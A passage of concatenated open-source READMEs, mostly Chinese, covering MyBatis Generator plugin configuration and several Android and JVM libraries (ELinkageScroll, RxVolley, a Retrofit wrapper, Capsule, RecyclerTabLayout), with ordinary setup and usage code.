]]></comment> <!-- ############################################################################################################# /** * Adds the getter comment. * * @param method * the method * @param introspectedTable * the introspected table * @param introspectedColumn * the introspected column */ --> <comment ID="addGetterComment"><![CDATA[ <#if introspectedColumn??> /** * This method was generated by MyBatis Generator. * This method returns the value of the database column ${introspectedTable.fullyQualifiedTable}.${introspectedColumn.actualColumnName} * * @return the value of ${introspectedTable.fullyQualifiedTable}.${introspectedColumn.actualColumnName} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ <#else> /** * This method was generated by MyBatis Generator. * This method returns the value of the field ${method.name?replace("get","")?replace("is", "")?uncap_first} * * @return the value of field ${method.name?replace("get","")?replace("is", "")?uncap_first} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ </#if> ]]></comment> <!-- ############################################################################################################# /** * Adds the setter comment. * * @param method * the method * @param introspectedTable * the introspected table * @param introspectedColumn * the introspected column */ --> <comment ID="addSetterComment"><![CDATA[ <#if introspectedColumn??> /** * This method was generated by MyBatis Generator. * This method sets the value of the database column ${introspectedTable.fullyQualifiedTable}.${introspectedColumn.actualColumnName} * * @param ${method.parameters[0].name} the value for ${introspectedTable.fullyQualifiedTable}.${introspectedColumn.actualColumnName} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ <#else> /** * This method was generated by MyBatis Generator. * This method sets the value of the field ${method.name?replace("set","")?uncap_first} * * @param ${method.parameters[0].name} the value for field ${method.name?replace("set","")?uncap_first} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ </#if> ]]></comment> <!-- ############################################################################################################# /** * Adds the general method comment. * * @param method * the method * @param introspectedTable * the introspected table */ --> <comment ID="addGeneralMethodComment"><![CDATA[ /** * This method was generated by MyBatis Generator. * This method corresponds to the database table ${introspectedTable.fullyQualifiedTable} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ ]]></comment> </template> ``` ### 14. 增量插件 为更新操作生成set filedxxx = filedxxx +/- inc 操作,方便某些统计字段的更新操作,常用于某些需要计数的场景; >warning:该插件在整合LombokPlugin使用时会生成大量附加代码影响代码美观,强力建议切换到新版插件[IncrementPlugin](#22-增量插件); 插件: ```xml <xml> <!-- 增量插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.IncrementsPlugin" /> <table tableName="tb"> <!-- 配置需要进行增量操作的列名称(英文半角逗号分隔) --> <property name="incrementsColumns" value="field1,field2"/> </table> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // 在构建更新对象时,配置了增量支持的字段会增加传入增量枚举的方法 Tb tb = Tb.builder() .id(102) .field1(1, Tb.Builder.Inc.INC) // 字段1 统计增加1 .field2(2, Tb.Builder.Inc.DEC) // 字段2 统计减去2 .field4(new Date()) .build(); // 更新操作,可以是 updateByExample, updateByExampleSelective, updateByPrimaryKey // , updateByPrimaryKeySelective, upsert, upsertSelective等所有涉及更新的操作 this.tbMapper.updateByPrimaryKey(tb); } } ``` ### 15. 查询结果选择性返回插件 一般我们在做查询优化的时候会要求查询返回时不要返回自己不需要的字段数据,因为Sending data所花费的时间和加大内存的占用 ,所以我们看到官方对于大数据的字段会拆分成xxxWithBLOBs的操作,但是这种拆分还是不能精确到具体列返回。 所以该插件的作用就是精确指定查询操作所需要返回的字段信息,实现查询的精确返回。 >warning: 因为采用的是resultMap进行的属性绑定(即时设置了constructorBased=true也无效,因为参数个数不一致会导致异常,该插件也会另外生成一个基于属性绑定的resultMap), 所以可能会出现list中存在null元素的问题,这个是mybatis自身机制造成的当查询出来的某行所有列都为null时不会生成对象(PS:其实这个不能算是错误,mybatis这样处理也说的通,但是在使用时还是要注意null的判断,当然如果有什么配置或者其他处理方式欢迎反馈哦)。 插件: ```xml <xml> <!-- 查询结果选择性返回插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.SelectSelectivePlugin" /> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // 查询操作精确返回需要的列 this.tbMapper.selectByExampleSelective( new TbExample() .createCriteria() .andField1GreaterThan(1) .example(), Tb.Column.field1, Tb.Column.field2 ); // 同理还有 selectByPrimaryKeySelective,selectOneByExampleSelective(SelectOneByExamplePlugin插件配合使用)方法 // 当然可以使用excludes this.tbMapper.selectByExampleSelective( new TbExample() .createCriteria() .andField1GreaterThan(1) .example(), Tb.Column.excludes(Tb.Column.id, Tb.Column.delFlag) ); } } ``` ### 16. 官方ConstructorBased配置BUG临时修正插件 当javaModelGenerator配置constructorBased=true时,如果表中只有一个column类型为“blob”时java model没有生成BaseResultMap对应的构造函数, 这个bug已经反馈给官方[issues#267](https://github.com/mybatis/generator/issues/267)。 > 官方V1.3.6版本将解决这个bug,老版本的可以使用这个插件临时修正问题。 插件: ```xml <xml> <!-- 官方ConstructorBased配置BUG临时修正插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.ConstructorBasedBugFixPlugin" /> </xml> ``` ### 17. 乐观锁插件 为并发操作引入乐观锁,当发生删除或者更新操作时调用相应的WithVersion方法传入版本号,插件会在相应的查询条件上附加上版本号的检查,防止非法操作的发生。 同时在更新操作中支持自定义nextVersion或者利用sql 的“set column = column + 1”去维护版本号。 插件: ```xml <xml> <!-- 乐观锁插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.OptimisticLockerPlugin"> <!-- 是否启用自定义nextVersion,默认不启用(插件会默认使用sql的 set column = column + 1) --> <property name="customizedNextVersion" value="false"/> </plugin> <table tableName="tb"> <!-- 这里可以单独表配置,覆盖全局配置 --> <property name="customizedNextVersion" value="true"/> <!-- 指定版本列 --> <property name="versionColumn" value="version"/> </table> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // ============================ 带版本号的删除更新等操作 =============================== int result = this.tbMapper.deleteWithVersionByExample( 100, // 版本号 new TbExample() .createCriteria() .andField1GreaterThan(1) .example() ); if (result == 0){ throw new Exception("没有找到数据或者数据版本号错误!"); } // 对应生成的Sql: delete from tb WHERE version = 100 and ( ( field1 > 1 ) ) // 带版本号的方法有: // deleteWithVersionByExample、deleteWithVersionByPrimaryKey、 // updateWithVersionByExampleSelective、updateWithVersionByExampleWithBLOBs、updateWithVersionByExample // updateWithVersionByPrimaryKeySelective、updateWithVersionByPrimaryKeyWithBLOBs、updateWithVersionByPrimaryKey // ============================= 使用默认版本号生成策略 =========================== this.tbMapper.updateWithVersionByPrimaryKey( 100, // 版本号 Tb.builder() .id(102) .field1("ts1") .build() ); // 对应生成的Sql: update tb set version = version + 1, field1 = 'ts1' where version = 100 and id = 102 // ============================= 使用自定义版本号生成策略 =========================== this.tbMapper.updateWithVersionByPrimaryKey( 100, // 版本号 Tb.builder() .id(102) .field1("ts1") .build() .nextVersion(System.currentTimeMillis()) // 传入nextVersion ); // 对应生成的Sql: update tb set version = 1525773888559, field1 = 'ts1' where version = 100 and id = 102 } } ``` ### 18. 表重命名配置插件 官方提供了domainObjectRenamingRule(官方最新版本已提供)、columnRenamingRule分别进行生成的表名称和对应表字段的重命名支持,但是它需要每个表单独进行配置,对于常用的如表附带前缀“t_”、字段前缀“f_”这种全局性替换会比较麻烦。 该插件提供了一种全局替换机制,当表没有单独指定domainObjectRenamingRule、columnRenamingRule时采用全局性配置。 同时插件提供clientSuffix、exampleSuffix、modelSuffix来修改对应生成的类和文件的结尾(之前issue中有用户希望能把Mapper替换成Dao)。 - 全局domainObjectRenamingRule ```xml <xml> <!-- 表重命名配置插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.TableRenameConfigurationPlugin"> <property name="domainObjectRenamingRule.searchString" value="^T"/> <property name="domainObjectRenamingRule.replaceString" value=""/> </plugin> <table tableName="tb"> <!-- 这里可以禁用全局domainObjectRenamingRule配置 --> <property name="domainObjectRenamingRule.disable" value="true"/> </table> <table tableName="tb_ts1"> <!-- 当然你也可以使用官方domainObjectRenamingRule的配置来覆盖全局配置 --> <domainObjectRenamingRule searchString="^Tb" replaceString="B"/> </table> </xml> ``` - 全局columnRenamingRule ```xml <xml> <!-- 表重命名配置插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.TableRenameConfigurationPlugin"> <!-- 需要注意,这里的正则和官方一样是比对替换都是原始表的column名称 --> <property name="columnRenamingRule.searchString" value="^f_"/> <property name="columnRenamingRule.replaceString" value="_"/> </plugin> <table tableName="tb"> <!-- 这里可以禁用全局columnRenamingRule配置 --> <property name="columnRenamingRule.disable" value="true"/> </table> <table tableName="tb_ts1"> <!-- 当然你也可以使用官方domainObjectRenamingRule的配置来覆盖全局配置 --> <columnRenamingRule searchString="^f_" replaceString="_"/> </table> </xml> ``` - clientSuffix、exampleSuffix、modelSuffix ```xml <xml> <!-- 表重命名配置插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.TableRenameConfigurationPlugin"> <!-- TbMapper -> TbDao, TbMapper.xml -> TbDao.xml --> <property name="clientSuffix" value="Dao"/> <!-- TbExmaple -> TbQuery --> <property name="exampleSuffix" value="Query"/> <!-- Tb -> TbEntity --> <property name="modelSuffix" value="Entity"/> </plugin> </xml> ``` ### 19. Lombok插件 使用Lombok的使用可以减少很多重复代码的书写,目前项目中已大量使用。 但Lombok的@Builder对于类的继承支持很不好,最近发现新版(>=1.18.2)已经提供了对@SuperBuilder的支持,所以新增该插件方便简写代码。 >warning1: @Builder注解在Lombok 版本 >= 1.18.2 的情况下才能开启,对于存在继承关系的model会自动替换成@SuperBuilder注解(目前IDEA的插件对于SuperBuilder的还不支持(作者已经安排上更新日程), 可以开启配置supportSuperBuilderForIdea使插件在遇到@SuperBuilder注解时使用ModelBuilderPlugin替代该注解)。 >warning2: 配合插件IncrementsPlugin(已不推荐使用,请使用新版[IncrementPlugin](#22-增量插件)解决该问题) 并且 @Builder开启的情况下,因为@SuperBuilder的一些限制, 插件模拟Lombok插件生成了一些附加代码可能在某些编译器上会提示错误,请忽略(Lombok = 1.18.2 已测试)。 ```xml <xml> <!-- Lombok插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.LombokPlugin"> <!-- @Data 默认开启,同时插件会对子类自动附加@EqualsAndHashCode(callSuper = true),@ToString(callSuper = true) --> <property name="@Data" value="true"/> <!-- @Builder 必须在 Lombok 版本 >= 1.18.2 的情况下开启,对存在继承关系的类自动替换成@SuperBuilder --> <property name="@Builder" value="false"/> <!-- @NoArgsConstructor 和 @AllArgsConstructor 使用规则和Lombok一致 --> <property name="@AllArgsConstructor" value="false"/> <property name="@NoArgsConstructor" value="false"/> <!-- @Getter、@Setter、@Accessors 等使用规则参见官方文档 --> <property name="@Accessors(chain = true)" value="false"/> <!-- 临时解决IDEA工具对@SuperBuilder的不支持问题,开启后(默认未开启)插件在遇到@SuperBuilder注解时会调用ModelBuilderPlugin来生成相应的builder代码 --> <property name="supportSuperBuilderForIdea" value="false"/> </plugin> </xml> ``` ### 20. 数据ModelCloneable插件 数据Model实现Cloneable接口。 ```xml <xml> <!-- 数据ModelCloneable插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.ModelCloneablePlugin"/> </xml> ``` ### 21. 状态枚举生成插件 数据库中经常会定义一些状态字段,该工具可根据约定的注释格式生成对应的枚举类,方便使用。 >warning:插件1.2.18版本以后默认开启自动扫描,根据约定注释格式自动生成对应枚举类 ```xml <xml> <!-- 状态枚举生成插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.EnumTypeStatusPlugin"> <!-- 是否开启自动扫描根据约定注释格式生成枚举,默认true --> <property name="autoScan" value="true"/> <!-- autoScan为false,这里可以定义全局需要检查生成枚举类的列名 --> <property name="enumColumns" value="type, status"/> </plugin> <table tableName="tb"> <!-- autoScan为false,也可以为单独某个table增加配置 --> <property name="enumColumns" value="user_type"/> </table> </xml> ``` >warning: 约定的注释检查规则的正则表达式如下 ```java public class EnumTypeStatusPlugin { public final static String REMARKS_PATTERN = ".*\\s*\\[\\s*(\\w+\\s*\\(\\s*[\\u4e00-\\u9fa5_\\-a-zA-Z0-9]+\\s*\\)\\s*:\\s*[\\u4e00-\\u9fa5_\\-a-zA-Z0-9]+\\s*\\,?\\s*)+\\s*\\]\\s*.*"; } ``` 使用 ```sql CREATE TABLE `tb` ( `type` smallint(3) COMMENT '注释[success(0):成功, fail(1):失败]', `status` bigint(3) COMMENT '换行的注释 [ login_success(0):登录成功, login_fail(1):登录失败 ]', `user_type` varchar(20) COMMENT '具体注释的写法是比较宽泛的,只要匹配上面正则就行 [ success ( 我是具体值 ) : 我是值的描述_我可以是中英文数字和下划线_xxx_123, fail_xx_3 (1 ) : 失败] 后面也可以跟注释' ); ``` ```java public class Tb { public enum Type { SUCCESS((short)0, "成功"), FAIL((short)1, "失败"); private final Short value; private final String name; Type(Short value, String name) { this.value = value; this.name = name; } public Short getValue() { return this.value; } public Short value() { return this.value; } public String getName() { return this.name; } public Field2 parseValue(Short value) { if (value != null) { for (Field2 item : values()) { if (item.value.equals(value)) { return item; } } } return null; } public Field2 parseName(String name) { if (name != null) { for (Field2 item : values()) { if (item.name.equals(name)) { return item; } } } return null; } } public enum Status { LOGIN_SUCCESS(0L, "登录成功"), LOGIN_FAIL(1L, "登录失败"); private final Long value; private final String name; Status(Long value, String name) { this.value = value; this.name = name; } public Long getValue() { return this.value; } public Long value() { return this.value; } public String getName() { return this.name; } public Status parseValue(Short value) { if (value != null) { for (Status item : values()) { if (item.value.equals(value)) { return item; } } } return null; } public Status parseName(String name) { if (name != null) { for (Status item : values()) { if (item.name.equals(name)) { return item; } } } return null; } } public enum UserType { SUCCESS("我是具体值", "我是值的描述_我可以是中英文数字和下划线_xxx_123"), FAIL_XX_3("1", "失败"); private final String value; private final String name; UserType(String value, String name) { this.value = value; this.name = name; } public String getValue() { return this.value; } public String value() { return this.value; } public String getName() { return this.name; } public UserType parseValue(Short value) { if (value != null) { for (UserType item : values()) { if (item.value.equals(value)) { return item; } } } return null; } public UserType parseName(String name) { if (name != null) { for (UserType item : values()) { if (item.name.equals(name)) { return item; } } } return null; } } } ``` ### 22. 增量插件 为更新操作生成set filedxxx = filedxxx +/- inc 操作,方便某些统计字段的更新操作,常用于某些需要计数的场景,需配合([ModelColumnPlugin](#8-数据model属性对应column获取插件))插件使用; 插件: ```xml <xml> <!-- 增量插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.IncrementPlugin" /> <table tableName="tb"> <!-- 配置需要进行增量操作的列名称(英文半角逗号分隔) --> <property name="incrementColumns" value="field1,field2"/> </table> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // 在构建更新对象时,配置了增量支持的字段会增加传入增量枚举的方法 Tb tb = Tb.builder() .id(102) .field4(new Date()) .build() .increment(Tb.Increment.field1.inc(1)) // 字段1 统计增加1 .increment(Tb.Increment.field2.dec(2)); // 字段2 统计减去2 // 更新操作,可以是 updateByExample, updateByExampleSelective, updateByPrimaryKey // , updateByPrimaryKeySelective, upsert, upsertSelective等所有涉及更新的操作 this.tbMapper.updateByPrimaryKey(tb); } } ``` ### 23. Mapper注解插件 对官方的([MapperAnnotationPlugin](http://www.mybatis.org/generator/reference/plugins.html))增强,可自定义附加@Repository注解(IDEA工具对@Mapper注解支持有问题,使用@Autowired会报无法找到对应bean,附加@Repository后解决); 插件: ```xml <xml> <!-- Mapper注解插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.MapperAnnotationPlugin"> <!-- @Mapper 默认开启 --> <property name="@Mapper" value="true"/> <!-- @Repository 开启后解决IDEA工具@Autowired报错 --> <property name="@Repository" value="org.springframework.stereotype.Repository"/> <!-- 其他自定义注解 --> <property name="@DS(&quot;master&quot;)" value="com.baomidou.dynamic.datasource.annotation.DS"/> </plugin> </xml> ```
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# ELinkageScroll 多子view嵌套滚动通用解决方案 ### Demo运行效果 <img src='https://github.com/baiduapp-tec/ELinkageScroll/blob/master/elinkagescroll.gif' width="300px" style='border: #f1f1f1 solid 1px'/><br> # 使用方法 #### xml ```xml <?xml version="1.0" encoding="utf-8"?> <com.baidu.elinkagescroll.ELinkageScrollLayout xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="match_parent" android:layout_height="match_parent"> <!-- 第1个子view --> <com.baidu.elinkagescroll.view.LWebView android:id="@+id/webview" android:layout_width="match_parent" android:layout_height="match_parent"/> <!-- 第2个子view --> <com.baidu.elinkagescroll.view.LLinearLayout android:layout_width="match_parent" android:layout_height="wrap_content" android:orientation="vertical"> <TextView android:layout_width="match_parent" android:layout_height="100dp" android:textSize="22dp" android:gravity="center" android:background="#22ff0000" android:text="LinearLayout"/> <Button android:layout_width="match_parent" android:layout_height="200dp" android:text="LinearLayout" android:onClick="onLLButtonClick"/> <TextView android:layout_width="match_parent" android:layout_height="150dp" android:textSize="22dp" android:gravity="center" android:background="#22ff0000" android:text="LinearLayout"/> </com.baidu.elinkagescroll.view.LLinearLayout> <!-- 第3个子view --> <com.baidu.elinkagescroll.view.LRecyclerView android:id="@+id/recycler1" android:layout_width="match_parent" android:layout_height="match_parent"/> <!-- 第4个子view --> <com.baidu.elinkagescroll.view.LTextView android:layout_width="match_parent" android:layout_height="300dp" android:background="@color/colorPrimary" android:text="TextView" android:clickable="true" android:textColor="#ffffff" android:textSize="28dp" android:gravity="center"/> <!-- 第5个子view --> <com.baidu.elinkagescroll.view.LRecyclerView android:id="@+id/recycler2" android:layout_width="match_parent" android:layout_height="wrap_content"/> <!-- 第6个子view --> <com.baidu.elinkagescroll.view.LScrollView android:layout_width="match_parent" android:layout_height="wrap_content"> <LinearLayout android:layout_width="match_parent" android:layout_height="wrap_content" android:orientation="vertical"> <TextView android:layout_width="match_parent" android:layout_height="200dp" android:text="ScrollView - 1" android:textSize="22dp" android:background="#22ff0000" android:gravity="center"/> <View android:layout_width="match_parent" android:layout_height="1px" android:background="#000000"/> <TextView android:layout_width="match_parent" android:layout_height="200dp" android:text="ScrollView - 2" android:textSize="22dp" android:background="#22ff0000" android:gravity="center"/> <View android:layout_width="match_parent" android:layout_height="1px" android:background="#000000"/> <TextView android:layout_width="match_parent" android:layout_height="200dp" android:text="ScrollView - 3" android:textSize="22dp" android:background="#22ff0000" android:gravity="center"/> <View android:layout_width="match_parent" android:layout_height="1px" android:background="#000000"/> <TextView android:layout_width="match_parent" android:layout_height="200dp" android:text="ScrollView - 4" android:textSize="22dp" android:background="#22ff0000" android:gravity="center"/> <View android:layout_width="match_parent" android:layout_height="1px" android:background="#000000"/> <TextView android:layout_width="match_parent" android:layout_height="200dp" android:text="ScrollView - 5" android:textSize="22dp" android:background="#22ff0000" android:gravity="center"/> </LinearLayout> </com.baidu.elinkagescroll.view.LScrollView> <!-- 第7个子view --> <com.baidu.elinkagescroll.sample.LFrameLayout android:layout_width="match_parent" android:layout_height="match_parent"> <android.support.v7.widget.RecyclerView android:id="@+id/recycler_in_framelayout" android:layout_width="match_parent" android:layout_height="match_parent"/> </com.baidu.elinkagescroll.sample.LFrameLayout> </com.baidu.elinkagescroll.ELinkageScrollLayout> ``` # 联系方式 如果你在使用ELinkageScrollLayout过程中发现任何问题,你可以通过如下方式联系我: * 邮箱: * 微博:https://weibo.com/u/5894400455
RxVolley = Volley + RxJava(RxJava3.0) + OkHttp(OkHttp3)
[![OSL](https://kymjs.com/qiniu/image/logo3.png)](https://kymjs.com/works/) ================= > RxVolley = Volley + RxAndroid3 + OkHttp3 [中文帮助](https://github.com/kymjs/RxVolley/blob/master/Readme_zh.md) ## Retrofit? No, I Love Volley. RxVolley is modified Volley. Removed the HttpClient, and support RxJava. If you are building with Gradle, simply add the following line to the ```dependencies``` section of your ```build.gradle``` file: latest version numbers: [![](https://jitpack.io/v/kymjs/RxVolley.svg)](https://jitpack.io/#kymjs/RxVolley) >implementation 'com.github.kymjs.rxvolley:rxvolley:3.0.0' > >// If use okhttp function >implementation 'com.github.kymjs.rxvolley:okhttp3:3.0.0' >//or okhttp2 >implementation 'com.github.kymjs.rxvolley:okhttp:3.0.0' > >// If use image-loader function >implementation 'com.github.kymjs.rxvolley:image:3.0.0' ## Getting Started Builder pattern to create objects. #### Callback method do Get request and contenttype is form ``` HttpParams params = new HttpParams(); //http header, optional parameters params.putHeaders("cookie", "your cookie"); params.putHeaders("User-Agent", "rxvolley"); //request parameters params.put("name", "kymjs"); params.put("age", "18"); HttpCallback callBack = new HttpCallback(){ @Override public void onSuccess(String t) { } @Override public void onFailure(int errorNo, String strMsg) { } } new RxVolley.Builder() .url("https://www.kymjs.com/rss.xml") .httpMethod(RxVolley.Method.GET) //default GET or POST/PUT/DELETE/HEAD/OPTIONS/TRACE/PATCH .cacheTime(6) //default: get 5min, post 0min .contentType(RxVolley.ContentType.FORM)//default FORM or JSON .params(params) .shouldCache(true) //default: get true, post false .callback(callBack) .encoding("UTF-8") //default .doTask(); ``` #### Callback method do Post request and contenttype is json ``` String paramJson = "{\n" + " \"name\": \"kymjs\", " + " \"age\": \"18\" " + "}"; //request parameters, json format HttpParams params = new HttpParams(); params.putJsonParams(paramJson); // upload progress ProgressListener listener = new ProgressListener(){ @Override public void onProgress(long transferredBytes, long totalSize){ } } new RxVolley.Builder() .url("https://www.kymjs.com/rss.xml") .httpMethod(RxVolley.Method.POST) //default GET or POST/PUT/DELETE/HEAD/OPTIONS/TRACE/PATCH .cacheTime(6) //default: get 5min, post 0min .params(params) .contentType(RxVolley.ContentType.JSON) .shouldCache(true) //default: get true, post false .progressListener(listener) //upload progress .callback(callback) .encoding("UTF-8") //default .doTask(); ``` #### return Observable\<Result\> type ``` Observable<Result> observable = new RxVolley.Builder() .url("https://www.kymjs.com/rss.xml") .httpMethod(RxVolley.Method.POST) //default GET or POST/PUT/DELETE/HEAD/OPTIONS/TRACE/PATCH .cacheTime(6) //default: get 5min, post 0min .params(params) .contentType(RxVolley.ContentType.JSON) .getResult(); //do something observable.subscribe(subscriber); ``` ## Requirements RxVolley can be included in any Android application. RxVolley supports Android 3.1, API12 (HONEYCOMB_MR1) and later. ## License Licensed under the Apache License Version 2.0. [The "License"](http://www.apache.org/licenses/LICENSE-2.0)
# Retrofit+Rxjava+okhttp封装 ![Preview](https://github.com/wzgiceman/RxjavaRetrofitDemo-string-master/blob/master/gif/rxretrofit.gif) 1.Retrofit+Rxjava+okhttp基本使用方法 2.统一处理请求数据格式 3.统一的ProgressDialog和回调Subscriber处理 4.取消http请求 5.预处理http请求 6.返回数据的统一判断 7.失败后的retry处理 8.RxLifecycle管理生命周期,防止泄露 9.文件上传下载(支持多文件,断点续传) 10.Cache数据持久化和数据库(greenDao)两种缓存机制 ## 依赖工程 * 1.moudel导入工程 ```java compile project(':rxretrofitlibrary') ``` * 2.初始化设置:Application中初始化 ```java RxRetrofitApp.init(this); ``` ## 代码使用 更多用法请参考demo ```java // 完美封装简化版 private void simpleDo() { SubjectPost postEntity = new SubjectPost(simpleOnNextListener,this); postEntity.setAll(true); HttpManager manager = HttpManager.getInstance(); manager.doHttpDeal(postEntity); } // 回调一一对应 HttpOnNextListener simpleOnNextListener = new HttpOnNextListener<List<Subject>>() { @Override public void onNext(List<Subject> subjects) { tvMsg.setText("已封装:\n" + subjects.toString()); } /*用户主动调用,默认是不需要覆写该方法*/ @Override public void onError(Throwable e) { super.onError(e); tvMsg.setText("失败:\n" + e.toString()); } } ``` * 初始化一个请求数据的对象继承BaseEntity对象,传递一个sub回调对象和context对象,设置请求需要的参数 * 通过单利获取一个httpmanger对象,触发请求 * 结果统一通过BaseEntity中的fun1方法判断,最后返回传递的sub对象中 ## 变种-推荐使用 在之前的封装1-5中我们都是通过传统的GsonConverterFactory自动解析,这样做确实很方便,用户能直接获取返回的对象,不用关心具体的转换,但是:这随之而来有很多的缺陷(虽然官网推荐这样使用); 比如:无法使用其他第三发转换框架;泛型无法中间传递,封装无法统一处理缓存结果;回调信息无法统一处理.......... 所以我们在享受它遍历的同时也被迫的要限制做很多的处理,限制我们的扩展! 介绍如何放弃GsonConverterFactory,直接返回String,扩展我们的封装!(封装的整体思想和之前的封装一样,所以不会有大的改动!) >[Rxjava+ReTrofit+okHttp深入浅出-终极封装变种](https://github.com/wzgiceman/RxjavaRetrofitDemo-string-master) >[Rxjava+ReTrofit+okHttp极简方式使用-无需任何学习成本](https://github.com/wzgiceman/Rx-Retrofit) ## 思路 详细思路可以可以参看我的博客: [Rxjava+ReTrofit+okHttp深入浅出-终极封装](http://blog.csdn.net/column/details/13297.html) ## 问题反馈列表集合 [问题反馈列表集合-汇总解决](https://github.com/wzgiceman/RxjavaRetrofitDemo-master/blob/master/README_ep.md) ## QQ交流群 ![](https://github.com/wzgiceman/Rxbus/blob/master/gif/qq.png)
Dead-Simple Packaging and Deployment for JVM Apps
deployment jar java jvm packaging
# *Capsule*<br/>Dead-Simple Packaging and Deployment for JVM Applications [![Build Status](http://img.shields.io/travis/puniverse/capsule.svg?style=flat)](https://travis-ci.org/puniverse/capsule) [![Coverage](https://coveralls.io/repos/puniverse/capsule/badge.svg?branch=master)](https://coveralls.io/r/puniverse/capsule?branch=master) [![Dependency Status](https://www.versioneye.com/user/projects/539704a483add7f80a000030/badge.svg?style=flat)](https://www.versioneye.com/user/projects/539704a483add7f80a000030) [![Version](http://img.shields.io/badge/version-1.0.3-blue.svg?style=flat)](https://github.com/puniverse/capsule/releases) [![License](http://img.shields.io/badge/license-EPL-blue.svg?style=flat)](https://www.eclipse.org/legal/epl-v10.html) Capsule is a packaging and deployment tool for JVM applications. A capsule is a single executable JAR that contains everything your application needs to run either in the form of embedded files or as declarative metadata. It can contain your JAR artifacts, your dependencies and resources, native libraries, the require JRE version, the JVM flags required to run the application well, Java or native agents and more. In short, a capsule is a self-contained JAR that knows everything there is to know about how to run your application the way it's meant to run. One way of thinking about a capsule is as a fat JAR on steroids (that also allows native libraries and never interferes with your dependencies) and a declarative startup script rolled into one; another, is to see it is as the deploy-time counterpart to your build tool. Just as a build tool manages your build, Capsule manages the launching of your application. But while plain capsules are cool and let you ship any JVM application -- no matter how complex -- as a single executable JAR, caplets make capsules even more powerful. ## Documentation [Capsule website](http://www.capsule.io) ## Support Discuss Capsule on the capsule-user [Google Group/Mailing List](https://groups.google.com/forum/#!forum/capsule-user) ## Getting Started [Download](https://github.com/puniverse/capsule/releases) or: co.paralleluniverse:capsule:1.0.3 or: Clone the repository and gradle install ## License Copyright (c) 2014-2016, Parallel Universe Software Co. and Contributors. All rights reserved. This program and the accompanying materials are licensed under the terms of the Eclipse Public License v1.0 as published by the Eclipse Foundation. http://www.eclipse.org/legal/epl-v10.html As Capsule does not link in any way with any of the code bundled in the JAR file, and simply treats it as raw data, Capsule is no different from a self-extracting ZIP file (especially as manually unzipping and examining the JAR's contents is extremely easy). Capsule's own license, therefore, does not interfere with the licensing of the bundled software. In particular, even though Capsule's license is incompatible with the GPL/LGPL, it is permitted to distribute GPL programs packaged as capsules, as Capsule is simply a packaging medium and an activation script, and does not restrict access to the packaged GPL code. Capsule does not add any capability to, nor removes any from the bundled application. It therefore falls under the definition of an "aggregate" in the GPL's terminology.
vertical slide to switch to the next fragment page, looks like vertical viewpager
fragments slide taobao
# android-vertical-slide-view vertical slide to switch to the next fragment page. 仿照淘宝和聚美优品,在商品详情页,向上拖动时,可以加载下一页。使用ViewDragHelper,滑动比较流畅。<br><br> scrollView滑动到底部的时候,再行向上拖动时,添加了一些阻力。<br> ![PREVIEW](capture.gif)
An efficient TabLayout library implemented with RecyclerView.
# RecyclerTabLayout [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-RecyclerTabLayout-green.svg?style=flat)](https://android-arsenal.com/details/1/2220) An efficient TabLayout library implemented with RecyclerView. ## Features - Efficient when having many tabs - Easy setup with ViewPager (same as [TabLayout](http://developer.android.com/intl/ja/reference/android/support/design/widget/TabLayout.html) of Android Design Support Library) - RTL layout support ## UseCase - Many tabs layout - Infinite loop scrolling (imitated) ## Demos ![Years](art/years.gif) ![Loop](art/loop.gif) ![Basic](art/basic.gif) ![Icon](art/icon.gif) ## Samples <a href="https://play.google.com/store/apps/details?id=com.nshmura.recyclertablayout.demo"><img src="art/googleplay.png"/></a> ## Getting started In your build.gradle: ``` repositories { jcenter() } dependencies { compile 'com.nshmura:recyclertablayout:1.5.0' } ``` Define `RecyclerTabLayout` in xml layout with custom attributes. ```xml <com.nshmura.recyclertablayout.RecyclerTabLayout android:id="@+id/recycler_tab_layout" android:layout_width="match_parent" android:layout_height="48dp" rtl_tabIndicatorColor="?attr/colorAccent" rtl_tabIndicatorHeight="2dp" rtl_tabBackground="?attr/selectableItemBackground" rtl_tabTextAppearance="@android:style/TextAppearance.Small" rtl_tabSelectedTextColor="?android:textColorPrimary" rtl_tabMinWidth="72dp" rtl_tabMaxWidth="264dp" rtl_tabPaddingStart="12dp" rtl_tabPaddingTop="0dp" rtl_tabPaddingEnd="12dp" rtl_tabPaddingBottom="0dp" rtl_tabPadding="0dp"/> ``` Set up with the ViewPager. ```java ViewPager viewPager = (ViewPager) findViewById(R.id.view_pager); viewPager.setAdapter(adapter); RecyclerTabLayout recyclerTabLayout = (RecyclerTabLayout) findViewById(R.id.recycler_tab_layout); recyclerTabLayout.setUpWithViewPager(viewPager); ``` Or set up with ViewPager and Custom RecyclerView.Adapter that's extends `RecyclerTabLayout.Adapter`. ```java ViewPager viewPager = (ViewPager) findViewById(R.id.view_pager); viewPager.setAdapter(adapter); RecyclerTabLayout recyclerTabLayout = (RecyclerTabLayout) findViewById(R.id.recycler_tab_layout); recyclerTabLayout.setUpWithAdapter(new CustomRecyclerViewAdapter(viewPager)); ``` Here's sample of custom RecyclerView adapter. ```java public class CustomRecyclerViewAdapter extends RecyclerTabLayout.Adapter<CustomRecyclerViewAdapter.ViewHolder> { public DemoCustomView01Adapter(ViewPager viewPager) { super(viewPager); ... } @Override public ViewHolder onCreateViewHolder(ViewGroup parent, int viewType) { // Inflate your view. View view = ...; return new ViewHolder(view); } @Override public void onBindViewHolder(ViewHolder holder, int 